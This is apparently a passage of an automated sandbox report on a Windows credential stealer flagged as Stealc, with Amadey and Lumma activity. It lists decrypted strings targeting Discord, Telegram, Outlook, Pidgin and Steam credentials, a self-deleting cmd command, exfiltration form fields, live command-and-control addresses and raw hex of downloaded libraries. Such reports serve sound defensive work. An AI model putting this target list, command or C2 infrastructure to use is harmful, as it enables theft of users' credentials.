Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: files
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: done
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: https
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: build
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: token
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: file
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: message
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CBBA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB44C0 PK11_PubEncrypt,	0_2_6CBB44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CB84420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4440 PK11_PrivDecrypt,	0_2_6CBB4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CC025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CB9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB98670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CB98670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CBBA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CBDA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CBE0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CBB43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CBD7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CBDBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CB97D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CBD9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB3FF0 PK11_PrivDecryptPKCS1,	0_2_6CBB3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CBB3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6CBB9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6CBDDA40

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49736 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49743 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 14MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49740 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.8:57224 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.8:49743 -> 172.67.165.166:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49741

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 